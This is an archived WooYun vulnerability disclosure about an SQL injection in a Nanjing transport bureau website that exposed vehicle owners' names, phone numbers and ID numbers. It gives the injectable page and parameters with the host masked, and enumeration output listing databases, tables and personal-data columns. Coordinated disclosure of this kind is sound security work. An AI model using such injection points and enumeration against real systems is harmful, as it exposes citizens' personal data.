当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139047

漏洞标题:全市车主信息(姓名,电话,车型,身份证)等均可得到

相关厂商:南京交通运输局

漏洞作者: 逆流冰河

提交时间:2015-09-07 11:29

修复时间:2015-10-24 17:22

公开时间:2015-10-24 17:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-09: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-19: 细节向核心白帽子及相关领域专家公开
2015-09-29: 细节向普通白帽子公开
2015-10-09: 细节向实习白帽子公开
2015-10-24: 细节向公众公开

简要描述:

南京交通运输局,泄露所管辖所用车主的个人信息

详细说明:

1,http://**.**.**.**/,页面找到“道路业户”,点击进去后,找到注入点
**.**.**.**:9016/AppPage/GLYW/gl_yh_look_dh.aspx?yh=&jy=&lb=%E5%85%A8%E9%80%89
2,694个数据库沦陷
available databases [94]:
[*] 110
[*] BGT_MOA_TT
[*] BGT_MOAT
[*] BUILDING_DATA
[*] BUILDING_USER
[*] CIMS
[*] CONSOLE
[*] CTXSYS
[*] DATACENTER
[*] DBSNMP
[*] DFLZ
[*] DMSYS
[*] DZKC
[*] EP
[*] EPOINT_GGZY
[*] EPOINT_JCXT
[*] EPOINT_NJGGZY
[*] EPOINT_WEBAUDIT_NJ
[*] EXFSYS
[*] FLJG
[*] GTIG_NEWTECH_BX
[*] GTIG_NEWTECH_CENTER
[*] GTIG_NEWTECH_GC
[*] GTIG_NEWTECH_GCJD
[*] GTIG_NEWTECH_GL
[*] GTIG_NEWTECH_GX
[*] GTIG_NEWTECH_HGY
[*] GTIG_NEWTECH_JJKF
[*] GTIG_NEWTECH_JN
[*] GTIG_NEWTECH_JNKF
[*] GTIG_NEWTECH_JY
[*] GTIG_NEWTECH_LH
[*] GTIG_NEWTECH_LS
[*] GTIG_NEWTECH_NBXC
[*] GTIG_NEWTECH_PK
[*] GTIG_NEWTECH_PKXC
[*] GTIG_NEWTECH_QH
[*] GTIG_NEWTECH_QLKJCXY
[*] GTIG_NEWTECH_QX
[*] GTIG_NEWTECH_QXJD
[*] GTIG_NEWTECH_XG
[*] GTIG_NEWTECH_XW
[*] GTIG_NEWTECH_YCFW
[*] GTIG_NEWTECH_YH
[*] GZW
[*] IT
[*] JLL
[*] JTKJXM
[*] JTZFPT2
[*] JTZFRY
[*] LS_CGJ
[*] LS_JGJ
[*] MDSYS
[*] MOA2_USER
[*] MOC_MOA_USER
[*] MOC_ZYGL_USER
[*] NEWJSW
[*] NJGZW
[*] NJICCP
[*] NJICCPP
[*] NJRD
[*] NJZWFWRX2
[*] NJZYZ
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] SAFETY
[*] SCOTT
[*] SMC
[*] SUNTIAN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] USER_MOA
[*] USER_OA
[*] USER_XTBG
[*] USR_SPORTS_QYH
[*] USR_SPORTS_XXFB
[*] USR_SPORTSGAMES_DQ_NJ
[*] USR_SPORTSGAMES_NANJING
[*] WMSYS
[*] WW_SJGXK
[*] WW_SJJHZX
[*] XDB
[*] XXBS
[*] XZZF
[*] ZFRY
[*] ZX_CGJ
[*] ZX_HBJ
[*] ZX_JGJ
[*] ZX_JTJ
[*] ZX_QXJ
3,随便看一个库吧。
Database: NEWJSW
[175 tables]
+-------------------------------+
| BAK_JSW_DWDA_20130319 |
| BAK_JSW_DWDA_20130320 |
| BAK_JSW_DWDA_20130320_2 |
| BZ_JDB |
| BZ_JDB2 |
| BZ_JSBT_BTJGB |
| BZ_JSBT_BTJS |
| BZ_JSBT_DLGXB |
| BZ_JSBT_DWTZHB |
| BZ_JSBT_DWTZHB_NEW |
| BZ_JSBT_FFFSB |
| BZ_JSBT_JDB |
| BZ_JSBT_LSGXB |
| BZ_JSBT_QHDZB |
| BZ_JSBT_RYLBB |
| BZ_JSBT_SQB |
| BZ_JSBT_SQMCH |
| BZ_JSBT_TCQHB |
| BZ_JSBT_TXTZB |
| BZ_JSBT_XBB |
| BZ_JSBT_ZJLXB |
| BZ_JSW_BLZT |
| BZ_JSW_FAIL_REASON |
| BZ_JSW_RYLXB |
| BZ_QMB |
| BZ_SQB |
| BZ_SQB2 |
| FF |
| JSBT_DWDA |
| JSBT_DWDA_320100V3 |
| JSBT_TXDA |
| JSBT_TXDA2 |
| JSBT_TXDA_320100V3 |
| JSBT_TXDA_BC |
| JSW_DWDA |
| JSW_DWDA_20130402BAK |
| JSW_DWDA_20130403BAK |
| JSW_DWDA_20130428BAK |
| JSW_DWDA_20130617BAK |
| JSW_DWDA_20130703BAK |
| JSW_DWDA_20130901BAK |
| JSW_DWDA_20130903BAK |
| JSW_DWDA_20131009BAK |
| JSW_DWDA_20131231BAK |
| JSW_DWDA_201400701BAK |
| JSW_DWDA_201400801BAK |
| JSW_DWDA_201400911BAK |
| JSW_DWDA_20140107BAK |
| JSW_DWDA_20140220BAK |
| JSW_DWDA_20140307BAK |
| JSW_DWDA_20140320BAK |
| JSW_DWDA_20140403BAK |
| JSW_DWDA_20140505BAK |
| JSW_DWDA_20140603BAK |
| JSW_DWDA_201407DELINFO |
| JSW_DWDA_20140804BAK |
| JSW_DWDA_20141010BAK |
| JSW_DWDA_20141104BAK |
| JSW_DWDA_20141201BAK |
| JSW_DWDA_20150114BAK |
| JSW_DWDA_20150202BAK |
| JSW_DWDA_20150309BAK |
| JSW_DWDA_RECOVERY |
| JSW_DWSTATUS_LOG |
| JSW_FLOW_RYB |
| JSW_GSQKMXB |
| JSW_GSQKMXB20130301BAK |
| JSW_GSQKMXB_20130424BAK |
| JSW_GSQKMXB_20131013BAK |
| JSW_GSQKMXB_DELINFO |
| JSW_GSQKMXB_RECOVERY |
| JSW_HPQKMXB |
| JSW_HPQKMXB2 |
| JSW_HPQKMXB2B20130301BAK |
| JSW_HPQKMXB2_20131013BAK |
| JSW_HPQKMXB2_20140415BAK |
| JSW_HPQKMXB2_BAK_222 |
| JSW_HPQKMXB2_RECOVERY |
| JSW_HPQKMXB_DELINFO |
| JSW_HQ |
| JSW_HQ2 |
| JSW_JFRY |
| JSW_JFRY_RECOVERY |
| JSW_LESSFIVE_CONFIRM |
| JSW_LESSFIVE_CONFIRM_RECOVERY |
| JSW_SQJLB |
| JSW_SQJLB20130301BAK |
| JSW_SQJLB20130301_02BAK |
| JSW_SQJLB20140619 |
| JSW_SQJLB20140701 |
| JSW_SQJLB_20131013BAK |
| JSW_SQJLB_BAK20130514 |
| JSW_SQJLB_BAK20130531 |
| JSW_SQJLB_DELINFO |
| JSW_SQJLB_FAIL |
| JSW_SQJLB_RECOVERY |
| JSW_TXDA |
| JSW_TXDA_20130403BAK |
| JSW_TXDA_20130428BAK |
| JSW_TXDA_20130617BAK |
| JSW_TXDA_20130703BAK |
| JSW_TXDA_20130712BAK |
| JSW_TXDA_20130901BAK |
| JSW_TXDA_20131009BAK |
| JSW_TXDA_20131013BAK |
| JSW_TXDA_20131231BAK |
| JSW_TXDA_20140107BAK |
| JSW_TXDA_20140112BAK |
| JSW_TXDA_20140220BAK |
| JSW_TXDA_20140307BAK |
| JSW_TXDA_20140403BAK |
| JSW_TXDA_20140505BAK |
| JSW_TXDA_20140509 |
| JSW_TXDA_20140603BAK |
| JSW_TXDA_20140701BAK |
| JSW_TXDA_20140801BAK |
| JSW_TXDA_20140804BAK |
| JSW_TXDA_20140911BAK |
| JSW_TXDA_20141010BAK |
| JSW_TXDA_20141104BAK |
| JSW_TXDA_20141201BAK |
| JSW_TXDA_20141215 |
| JSW_TXDA_2014DELINFO |
| JSW_TXDA_20150114BAK |
| JSW_TXDA_20150202BAK |
| JSW_TXDA_20150309BAK |
| JSW_TXDA_BAK_20130301 |
| JSW_TXDA_DELINFO |
| JSW_TXDA_RECOVERY |
| JSW_ZFQKMXB |
| JSW_ZFQKMXB20130301BAK |
| JSW_ZFQKMXB_20131013BAK |
| JSW_ZFQKMXB_BAK20130614 |
| JSW_ZFQKMXB_BAK20130630 |
| JSW_ZFQKMXB_DELINFO |
| JSW_ZFQKMXB_JC |
| JSW_ZFQKMXB_JC20130301BAK |
| JSW_ZFQKMXB_RECOVERY |
| JSW_ZFQKMXB_TMPSFZ |
| OA_ACTMENU |
| OA_FJB |
| OA_FJCSB |
| OA_GQCSB |
| OA_JSXXB |
| OA_MANAGER_QX |
| OA_MAN_ROLES |
| OA_ROLES |
| OA_ROLES_QX |
| OA_STATUS |
| OA_THEME |
| OA_TYMENU |
| OA_TYMENU_BAK |
| OA_TZ_FJB |
| OA_TZ_SJKSB |
| OA_TZ_XXB |
| OA_XXB |
| OA_YCCSB |
| OA_YDCSB |
| TMP_JSBT_HASNOTINSERT |
| TMP_JSBT_LEFT_RY |
| TMP_JSW_DWDA68 |
| TMP_JSW_HPQKMXB |
| TMP_JSW_HPQKMXB20130301BAK |
| TMP_JSW_LESSFIVE_CONFIRM |
| TMP_JSW_SQJLB |
| TMP_JSW_STOS |
| TMP_JSW_ZFQKMXB |
| TMP_JSW_ZFQKMXB_BAK20131009 |
| TTMP_JSW_ZFQKMXB20130301BAK |
| V_USER |
| XX |
| YX_RYB |
| YX_RYB2 |
| YX_RYB2_BAK20130225 |
| ZZZ |
+-------------------------------+
4,随便找个表看看字段
Database: NEWJSW
Table: YX_RYB
[12 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| CSNY | VARCHAR2 |
| DH | VARCHAR2 |
| JD | VARCHAR2 |
| KSM | VARCHAR2 |
| QH | VARCHAR2 |
| RYH | VARCHAR2 |
| SFZ | VARCHAR2 |
| THEME | VARCHAR2 |
| XB | VARCHAR2 |
| XM | VARCHAR2 |
| YX | VARCHAR2 |
| ZCSJ | VARCHAR2 |
+--------+----------+
5,这里有身份证号码啥的,我就不贴图了,毕竟是政府的网站,我比较小心啦

漏洞证明:

如题

修复方案:

毕竟是政府部门,所有车主的信息都可以随便得到。。。。
补补吧。

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-09 17:20

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无